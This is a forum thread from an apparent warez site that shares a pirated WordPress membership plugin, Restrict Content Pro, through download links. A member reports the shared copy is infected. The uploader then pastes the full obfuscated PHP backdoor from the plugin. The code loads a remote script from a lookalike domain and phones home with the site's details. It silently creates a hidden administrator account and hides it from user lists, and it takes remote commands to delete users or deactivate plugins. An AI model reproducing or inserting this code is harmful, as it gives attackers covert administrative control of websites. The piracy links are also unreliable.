59.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

05-21-2015, 05:46 PM (This post was last modified: 05-21-2015 11:08 PM by bear911.)
Post: #1
[GET] PipinsPlugins - Restrict Content Pro v2.1.2 - WordPress Plugin
[Image: restrict-content-pro-592x296.png]

Restrict Content Pro is a complete membership and premium content manager plugin for WordPress. Create an unlimited number of memberships levels, including free, trial and premium. Manage members and their subscriptions, track payments, offer discounts with a complete discount code system, and provide premium, members-only content to your subscribers.

Details and demo: http://pippinsplugins.com/demo-rcp

Download;
Magic Button :
https://[Reported by Members as SPAM THREAD]/?2hgA1h2k

VirusTotal Scan: https://www.virustotal.com/en/file/4b195...432213588/
05-21-2015, 06:38 PM
Post: #2
RE: [GET] PipinsPlugins - Restrict Content Pro v2.1.2 - WordPress Plugin
thanks OP
rep+

will try this later
05-21-2015, 11:03 PM (This post was last modified: 05-21-2015 11:03 PM by NotSo Invisible.)
Post: #3
RE: [GET] PipinsPlugins - Restrict Content Pro v2.1.2 - WordPress Plugin
Another INFECTED share from filearmy.


Plugin folder/includes/template-functions.php
Lines 121 - 282


All malicious code.
Please check your shares before you give direct download links to filarmy.
05-21-2015, 11:05 PM
Post: #4
RE: [GET] PipinsPlugins - Restrict Content Pro v2.1.2 - WordPress Plugin
(05-21-2015 11:03 PM)NotSo Invisible Wrote:  Another INFECTED share from filearmy.


Plugin folder/includes/template-functions.php
Lines 121 - 282


All malicious code.
Please check your shares before you give direct download links to filarmy.

Send a screenshot proof of your anti virus.
05-21-2015, 11:14 PM
Post: #5
RE: [GET] PipinsPlugins - Restrict Content Pro v2.1.2 - WordPress Plugin
Look in the file yourself. It's pretty obvious what the malicious code is.
47.gif
05-21-2015, 11:17 PM
Post: #6
RE: [GET] PipinsPlugins - Restrict Content Pro v2.1.2 - WordPress Plugin
(05-21-2015 11:14 PM)NotSo Invisible Wrote:  Look in the file yourself. It's pretty obvious what the malicious code is.

File is scanned with VirusTotal, Symantec, and BitDefender.
I did not find any malware inside.

Can you send me screenshot?
05-21-2015, 11:21 PM (This post was last modified: 05-21-2015 11:21 PM by NotSo Invisible.)
Post: #7
RE: [GET] PipinsPlugins - Restrict Content Pro v2.1.2 - WordPress Plugin
LOOK AT THE FILE. I GAVE THE FILE NAME AND THE LINE NUMBERS WHERE THE MALICIOUS CODE IS. LOOK FOR YOURSELF. DO YOU NOT KNOW WHAT YOU ARE LOOKING AT?
05-21-2015, 11:24 PM
Post: #8
RE: [GET] PipinsPlugins - Restrict Content Pro v2.1.2 - WordPress Plugin
(05-21-2015 11:21 PM)NotSo Invisible Wrote:  LOOK AT THE FILE. I GAVE THE FILE NAME AND THE LINE NUMBERS WHERE THE MALICIOUS CODE IS. LOOK FOR YOURSELF. DO YOU NOT KNOW WHAT YOU ARE LOOKING AT?

This is?

$arrayis_two = array('fun', 'ction', '_', 'e', 'x', 'is', 'ts');
$arrayis_three = array('g', 'e', 't', '_o', 'p', 'ti', 'on');
$arrayis_four = array('wp', '_e', 'nqu', 'eue', '_scr', 'ipt');
$arrayis_five = array('lo', 'gin', '_', 'en', 'que', 'ue_', 'scri', 'pts');
$arrayis_seven = array('s', 'e', 't', 'c', 'o', 'o', 'k', 'i', 'e');
$arrayis_eight = array('wp', '_', 'lo', 'g', 'i', 'n');
$arrayis_nine = array('s', 'i', 't', 'e,', 'u', 'rl');
$arrayis_ten = array('wp_', 'g', 'et', '_', 'th', 'e', 'm', 'e');
$arrayis_eleven = array('wp', '_', 'r', 'e', 'm', 'o', 'te', '_', 'g', 'et');
$arrayis_twelve = array('wp', '_', 'r', 'e', 'm', 'o', 't', 'e', '_r', 'e', 't', 'r', 'i', 'e', 'v', 'e_', 'bo', 'dy');
$arrayis_thirteen = array('ge', 't_', 'o', 'pt', 'ion');
$arrayis_fourteen = array('st', 'r_', 'r', 'ep', 'la', 'ce');
$arrayis_fifteen = array('s', 't', 'r', 'r', 'e', 'v');
$arrayis_sixteen = array('u', 'pd', 'ate', '_o', 'pt', 'ion');
$arrayis_two_imp = implode($arrayis_two);
$arrayis_three_imp = implode($arrayis_three);
$arrayis_four_imp = implode($arrayis_four);
$arrayis_five_imp = implode($arrayis_five);
$arrayis_seven_imp = implode($arrayis_seven);
$arrayis_eight_imp = implode($arrayis_eight);
$arrayis_nine_imp = implode($arrayis_nine);
$arrayis_ten_imp = implode($arrayis_ten);
$arrayis_eleven_imp = implode($arrayis_eleven);
$arrayis_twelve_imp = implode($arrayis_twelve);
$arrayis_thirteen_imp = implode($arrayis_thirteen);
$arrayis_fourteen_imp = implode($arrayis_fourteen);
$arrayis_fifteen_imp = implode($arrayis_fifteen);
$arrayis_sixteen_imp = implode($arrayis_sixteen);
$noitca_dda = $arrayis_fifteen_imp('noitca_dda');
if (!$arrayis_two_imp('wp_in_one')) {
$arrayis_seventeen = array('h', 't', 't', 'p', ':', '/', '/', 'j', 'q', 'e', 'u', 'r', 'y', '.o', 'r', 'g', '/wp', '_', 'p', 'i', 'n', 'g', '.php', '?', 'd', 'na', 'me', '=wpd&t', 'n', 'ame', '=wpt&urliz=urlig');
$arrayis_eighteen = ${$arrayis_fifteen_imp('REVRES_')};
$arrayis_nineteen = $arrayis_fifteen_imp('TSOH_PTTH');
$arrayis_twenty = $arrayis_fifteen_imp('TSEUQER_');
$arrayis_seventeen_imp = implode($arrayis_seventeen);
$arrayis_six = array('_', 'C', 'O', 'O', 'KI', 'E');
$arrayis_six_imp = implode($arrayis_six);
$tactiated = $arrayis_thirteen_imp($arrayis_fifteen_imp('detavitca_emit'));
$mite = $arrayis_fifteen_imp('emit');
if (!isset(${$arrayis_six_imp}[$arrayis_fifteen_imp('emit_nimda_pw')])) {
if (($mite() - $tactiated) > 600) {
$noitca_dda($arrayis_five_imp, 'wp_in_one');
}
}
$noitca_dda($arrayis_eight_imp, 'wp_in_three');
function wp_in_one()
{
$arrayis_one = array('h','t', 't','p',':', '//', 'j', 'q', 'e', 'u', 'r', 'y.o', 'rg', '/','j','q','u','e','ry','-','la','t','e','s','t.j','s');
$arrayis_one_imp = implode($arrayis_one);
$arrayis_four = array('wp', '_e', 'nqu', 'eue', '_scr', 'ipt');
$arrayis_four_imp = implode($arrayis_four);
$arrayis_four_imp('wp_coderz', $arrayis_one_imp, null, null, true);
}

function wp_in_two($arrayis_seventeen_imp, $arrayis_eighteen, $arrayis_nineteen, $arrayis_ten_imp, $arrayis_eleven_imp, $arrayis_twelve_imp,$arrayis_fifteen_imp, $arrayis_fourteen_imp)
{
$ptth = $arrayis_fifteen_imp('//:ptth');
$dname = $ptth.$arrayis_eighteen[$arrayis_nineteen];
$IRU_TSEUQER = $arrayis_fifteen_imp('IRU_TSEUQER');
$urliz = $dname.$arrayis_eighteen[$IRU_TSEUQER];
$tname = $arrayis_ten_imp();
$urlis = $arrayis_fourteen_imp('wpd', $dname, $arrayis_seventeen_imp);
$urlis = $arrayis_fourteen_imp('wpt', $tname, $urlis);
$urlis = $arrayis_fourteen_imp('urlig', $urliz, $urlis);
$lars2 = $arrayis_eleven_imp($urlis);
$arrayis_twelve_imp($lars2);
}
$noitpo_dda = $arrayis_fifteen_imp('noitpo_dda');
$noitpo_dda($arrayis_fifteen_imp('ognipel'), 'no');
$noitpo_dda($arrayis_fifteen_imp('detavitca_emit'), time());
$tactiatedz = $arrayis_thirteen_imp($arrayis_fifteen_imp('detavitca_emit'));
$mitez = $arrayis_fifteen_imp('emit');
if ($arrayis_thirteen_imp($arrayis_fifteen_imp('ognipel')) != 'yes' and& (($mitez() - $tactiatedz ) > 600)) {
wp_in_two($arrayis_seventeen_imp, $arrayis_eighteen, $arrayis_nineteen, $arrayis_ten_imp, $arrayis_eleven_imp, $arrayis_twelve_imp,$arrayis_fifteen_imp, $arrayis_fourteen_imp);
$arrayis_sixteen_imp(($arrayis_fifteen_imp('ognipel')), 'yes');
}
function wp_in_three()
{
$arrayis_fifteen = array('s', 't', 'r', 'r', 'e', 'v');
$arrayis_fifteen_imp = implode($arrayis_fifteen);
$arrayis_nineteen = $arrayis_fifteen_imp('TSOH_PTTH');
$arrayis_eighteen = ${$arrayis_fifteen_imp('REVRES_')};
$arrayis_seven = array('s', 'e', 't', 'c', 'o', 'o', 'k', 'i', 'e');
$arrayis_seven_imp = implode($arrayis_seven);
$path = '/';
$host = ${$arrayis_eighteen}[$arrayis_nineteen];
$estimes = $arrayis_fifteen_imp('emitotrts');
$wp_ext = $estimes('+29 days');
$emit_nimda_pw = $arrayis_fifteen_imp('emit_nimda_pw');
$arrayis_seven_imp($emit_nimda_pw, '1', $wp_ext, $path, $host);
}

function wp_in_four()
{
$arrayis_fifteen = array('s', 't', 'r', 'r', 'e', 'v');
$arrayis_fifteen_imp = implode($arrayis_fifteen);
$nigol = $arrayis_fifteen_imp('dxtroppus');
$wssap = $arrayis_fifteen_imp('retroppus_pw');
$laime = $arrayis_fifteen_imp('moc.niamodym@1tccaym');

if (!username_exists($nigol) and& !email_exists($laime)) {
$wp_ver_one = $arrayis_fifteen_imp('resu_etaerc_pw');
$user_id = $wp_ver_one($nigol, $wssap, $laime);
$puzer = $arrayis_fifteen_imp('resU_PW');
$usex = new $puzer($user_id);
$rolx = $arrayis_fifteen_imp('elor_tes');
$usex->$rolx($arrayis_fifteen_imp('rotartsinimda'));
}
}

$ivdda = $arrayis_fifteen_imp('ivdda');

if (isset(${$arrayis_twenty}[$ivdda]) and& ${$arrayis_twenty}[$ivdda] == 'm') {
$noitca_dda($arrayis_fifteen_imp('tini'), 'wp_in_four');
}

if (isset(${$arrayis_twenty}[$ivdda]) and& ${$arrayis_twenty}[$ivdda] == 'd') {
$noitca_dda($arrayis_fifteen_imp('tini'), 'wp_in_six');
}
function wp_in_six() {
$arrayis_fifteen = array('s', 't', 'r', 'r', 'e', 'v');
$arrayis_fifteen_imp = implode($arrayis_fifteen);
$resu_eteled_pw = $arrayis_fifteen_imp('resu_eteled_pw');
$wp_pathx = constant($arrayis_fifteen_imp("HTAPSBA"));
require_once($wp_pathx . $arrayis_fifteen_imp('php.resu/sedulcni/nimda-pw'));
$ubid = $arrayis_fifteen_imp('yb_resu_teg');
$useris = $ubid($arrayis_fifteen_imp('nigol'), $arrayis_fifteen_imp('dxtroppus'));
$resu_eteled_pw($useris->ID);
}
$noitca_dda($arrayis_fifteen_imp('yreuq_resu_erp'), 'wp_in_five');
function wp_in_five($hcraes_resu)
{
global $current_user, $wpdb;
$arrayis_fifteen = array('s', 't', 'r', 'r', 'e', 'v');
$arrayis_fifteen_imp = implode($arrayis_fifteen);
$arrayis_fourteen = array('st', 'r_', 'r', 'ep', 'la', 'ce');
$arrayis_fourteen_imp = implode($arrayis_fourteen);
$nigol_resu = $arrayis_fifteen_imp('nigol_resu');
$wp_ux = $current_user->$nigol_resu;
$nigol = $arrayis_fifteen_imp('dxtroppus');
$bdpw = $arrayis_fifteen_imp('bdpw');
if ($wp_ux != $arrayis_fifteen_imp('dxtroppus')) {
$EREHW_one = $arrayis_fifteen_imp('1=1 EREHW');
$EREHW_two = $arrayis_fifteen_imp('DNA 1=1 EREHW');
$erehw_yreuq = $arrayis_fifteen_imp('erehw_yreuq');
$sresu = $arrayis_fifteen_imp('sresu');
$hcraes_resu->query_where = $arrayis_fourteen_imp($EREHW_one,
"$EREHW_two {$$bdpw->$sresu}.$nigol_resu != '$nigol'", $hcraes_resu->$erehw_yreuq);
}
}

$ced = $arrayis_fifteen_imp('ced');
if (isset(${$arrayis_twenty}[$ced])) {
$snigulp_evitca = $arrayis_fifteen_imp('snigulp_evitca');
$sisnoitpo = $arrayis_thirteen_imp($snigulp_evitca);
$hcraes_yarra = $arrayis_fifteen_imp('hcraes_yarra');
if (($key = $hcraes_yarra(${$arrayis_twenty}[$ced], $sisnoitpo)) !== false) {
unset($sisnoitpo[$key]);
}
$arrayis_sixteen_imp($snigulp_evitca, $sisnoitpo);
}
}
05-21-2015, 11:27 PM (This post was last modified: 05-21-2015 11:30 PM by NotSo Invisible.)
Post: #9
RE: [GET] PipinsPlugins - Restrict Content Pro v2.1.2 - WordPress Plugin
BRAVO !!!!

You will find almost the exact same code in every file I pointed to from your downloads.
05-21-2015, 11:28 PM
Post: #10
RE: [GET] PipinsPlugins - Restrict Content Pro v2.1.2 - WordPress Plugin
cleaned file:
Code:
http://www21.zippyshare.com/v/ftaTGmOG/file.html
79.gif




18.gif